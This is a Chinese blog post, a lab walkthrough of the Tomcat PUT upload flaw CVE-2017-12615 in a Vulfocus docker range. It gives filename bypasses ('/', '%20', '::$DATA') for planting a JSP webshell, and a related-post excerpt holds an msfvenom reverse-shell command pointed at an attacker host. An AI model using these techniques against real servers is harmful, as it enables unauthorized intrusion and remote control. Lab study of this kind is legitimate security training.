tomcat任意文件上传

已于 2022-02-24 15:50:11 修改
阅读量945 收藏 2
点赞数 1
分类专栏: WEB安全 网络安全 渗透测试 文章标签: tomcat docker java
于 2022-02-24 15:18:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_59872639/article/details/123112326
版权
网络安全 同时被 3 个专栏收录
51 篇文章 20 订阅
订阅专栏
渗透测试
40 篇文章 35 订阅
订阅专栏
WEB安全
32 篇文章 14 订阅
订阅专栏

环境讲解

Vulfocus

Vulfocus 是一个漏洞集成平台,将漏洞环境 docker 镜像,放入即可使用,开箱即用。

部署Vulfocus

拉取vulfocus镜像

docker pull vulfocus/vulfocus:latest

运行vulfocus

docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock  -e VUL_IP=192.168.132.144 vulfocus/vulfocus
#如果端口被占用,则命令执行不成功
-v /var/run/docker.sock:/var/run/docker.sock 为 docker 交互连接。
-e DOCKER_URL 为 Docker 连接方式,默认通过 unix://var/run/docker.sock 进行连接,也可以通过 tcp://xxx.xxx.xxx.xxx:2375 进行连接(必须开放 2375 端口)。
-v /vulfocus-api/db.sqlite3:db.sqlite3 映射数据库为本地文件。
-e VUL_IP=xxx.xxx.xxx.xxx 为 Docker 服务器 IP ,不能为 127.0.0.1

Vulfocus登录

默认账户密码为 admin/admin

安装靶场

这里我们需要安装的是tomcat-cve_2017_12615

 启动靶场

 漏洞介绍 

  • Tomcat 远程代码执行漏洞,编号:CVE-2017-12615
  • Tomcat配置文件web.xml中,servlet配置了readonly=fasle时,会引发任意文件上传漏洞。
  • readonly参数默认是true,即不允许delete和put操作,所以通过XMLHttpRequest对象的put或者delete方法访问就会报告http 403错误。但很多时候为了支持REST服务,会设置该属性为false。将 readonly 参数设置为 false 时,即可通过 PUT 方式创建一个 JSP 文件,并可以执行任意代码。

 漏洞复现

抓包,修改方式为OPTIONS,发现允许PUT方法

 

现在访问Tomcat服务,抓包,对包进行一些修改。

将GET改成PUT 在包下方添加webshell木马
为了方便查看效果,右键,选择send tto repeater。

 

在repeater中发包

提示404请求被拦截

方法一 在文件名后面添加斜杠 / 来进行绕过

在这里插入图片描述

 方法二: 在文件名后面添加 %20 来进行绕过

在这里插入图片描述

 方法三:在文件名后面添加 ::$DATA来进行绕过

在这里插入图片描述

  1.  NTFS 文件流
  2. 文件名相关限制(如Windows中文件名不能以空格结尾)来绕过限制返回201说明文件已经上传成功。

  访问我们上传的文件,发现里面的代码已经被执行

通过webshell管理工具连接 

.SYS.
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
tomcat漏洞之任意文件上传(CVE-2017-12615)
千寻的博客
09-24 3629
文章目录0x00 漏洞介绍0x01影响版本0×02原理分析0×04 环境搭建0×04 漏洞复现-(任意上传文件)方法一 在文件名后面添加斜杠 / 来进行绕过方法二: 在文件名后面添加 %20 来进行绕过方法三:在文件名后面添加 ::$DATA来进行绕过方法四:上传哥斯特生产的jsp0x05 漏洞修护 0x00 漏洞介绍 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,该漏洞受影响版本为7.0-
Tomcat put任意文件上传
z.mumu的博客
09-10 1236
1.Tomcat8.5.19漏洞 PUT方法任意写文件漏洞(CVE-2017-12615) 打开burp尝试put方法任意文件上传 抓取页面,然后将Get方法改成PUT,注意文件名要/文件名/,然后内容直接空一行写在下面,返回201。 冰蝎连接 也可以使用msf生成jsp的木马进行连接 msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机ip LPORT=端口 -f raw > shell.jsp 然后msf设置监听访问 最后就是使用现有的exp 我
Tomcat任意文件上传(CVE-2017-12615)
m0_73720136的博客
05-07 1108
掌握文件上传中的Tomcat任意文件上传(CVE-2017-12615)漏洞影响的Tomcat版本以及配置文件,利用Burp Suite工具抓取数据包,将数据包内容修改,请求方式修改为PUT方式,上传新建的jsp脚本文件,文件内容可以任意编写,也可以是木马。1. NTFS文件流2. 文件名相关限制可以采取一些方法来绕过限制,比如Windows中文件名不能以空格结尾,在文件名后面加空格"%20",也可以加斜杠"/"。
Tomcat部署及优化
最新发布
2301_82109773的博客
06-17 1096
Servlet 是Java Servlet 的简称,可以理解为是一个服务连接器,是用 Java 编写的服务器端程序,具有独立于平台和协议的特性, 简单的理解:servlet 就是一个中间件,包含了接口和方法,将客户端和数据库连接,从而实现动态网页的创建。JSP 全称 Java Server Pages,是一种动态网页开发技术。它使用 JSP 标签在HTML网页中插入 Java 代码。标签通常以 <% 开头,以 %> 结束。
tomcat服务器的文件上传功能实现
天真吖的博客
12-03 1738
目录一、场景:展示向服务器添加商品,商品信息包括图片,以及其他信息1,获取数据2.添加数据3.传回数据到前台二、附:配置CATALINA_HOME三、效果展示 1,获取数据 2.添加数据 3.传回数据到前台 略 按‘i’进入insert模式,在最后加入 如:/usr/local/tomcat/apache-tomcat-9.0.68按ESC退出insert模式,按‘:wq’,保存退出使配置生效 新建一个在webapps下新建upload文件夹可以看到:pid为3的这条数据
Tomcat任意文件上传
shangMD01的博客
02-24 447
打开Tomcat: 打开burpsuite对Tomcat页面进行拦截: 在文件夹中找到冰蝎: 在冰蝎目录中找到shell.jsp查看 把shell.jsp文件内容复制到刚刚拦截的内容下: 发送到Response测试: 回显: 打开冰蝎: 双击新增网站: 文件上传成功: ...
关于对Apache Tomcat 文件包含高危漏洞开展安全加固的预警通报(1).doc
07-16
2020-1938 对应 CNVD-2020-10487)是近期发现的一项高危安全漏洞,该漏洞存在于 Tomcat 服务器的 AJP 协议中,攻击者可以通过构造特定参数的方式,读取服务器 webapp 目录下任意文件。如果服务器同时具备文件上传...
CVE-2020-1938 Apache Tomcat 文件包含EXP
03-29
该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。目前,厂商已发布新版本完成...
java多个文件上传tomcat需要的jar包
02-25
Java开发中,文件上传是一项常见的任务,尤其是在构建Web应用时。Tomcat作为一个流行的Java Servlet容器,提供了处理文件上传的功能。...通过这些知识,你就可以构建出能够处理任意数量文件上传的Web应用了。
Tomcat 8 免安装
01-08
3. **免安装使用**:免安装版Tomcat只需解压缩到任意目录,配置相关的环境变量如`CATALINA_HOME`,然后通过执行`bin/startup.sh`(Linux/Mac)或`bin/startup.bat`(Windows)脚本启动服务器,通过`bin/shutdown.sh`...
Tomcat漏洞总结.rar
12-19
tomcat 漏洞总结 包括后台暴力破解 幽灵猫getshell war包getshell 任意文件上传
启动 vulfocus docker报错
忘忧的博客
03-30 6347
报错信息如下: WARNING: IPv4 forwarding is disabled. Networking will not work. 警告:IPv4转发被禁用。 网络是行不通的。 解决办法 添加一下代码 net.ipv4.ip_forward=1 重启network服务 systemctl restart network 喜欢的话点个赞,留个关注呗~~ ...
javaweb,Tomcat,maven下创建的项目,如果用户上传文件,那么上传的文件的位置在Tomcat的webapps文件夹下
小邹的博客
11-24 699
编写上传文件的方法:准备把文件存储进/WEB-INF下,因为/WEB-INF下的文件不能直接被访问。 部分代码: // 创建上传文件的保存路径,建议在WEB-INF路径下,安全,用户无法直接访问上传的文件; String uploadPath = this.getServletContext().getRealPath("/WEB-INF/upload"); File uploadFile = new File(uploadPath); if (!uploa
tomcat10上传文件两种方式,两种亲测有效
qq_45325310的博客
03-16 2680
https://blog.csdn.net/python_hhhh/article/details/122688507
中间件安全:Apache Tomcat 文件上传.(CVE-2017-12615)
Karka_的博客
03-29 942
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
【vulfocus】tomcat文件上传 (CVE-2017-12615)
RexHa的博客
10-17 1471
vulfocus靶场 tomcat-文件上传 名称: vulfocus/tomcat-cve_2017_12615:latest
tomcat 文件上传 (CVE-2017-12615)vulfocus夺旗
muhan的博客
04-16 4169
漏洞原因: 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行 影响范围:Tomcat 7.0.0 - 7.0.81 测试:Tomcat 8.5.19 1、启动CVE-2017-12615目标靶场,并访问 2、burp抓包,并修改请求包 文件是1.sjp,内容是冰蝎的木马,请求
tomcat任意文件写入
09-22
tomcat任意文件写入漏洞的编号是CVE_2017-12615。当tomcat运行在Windows系统下,允许PUT方式的HTTP请求,并且tomcat的web.xml配置文件中readonly值为false时,攻击者可以利用该漏洞向服务器上传恶意jsp文件或...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值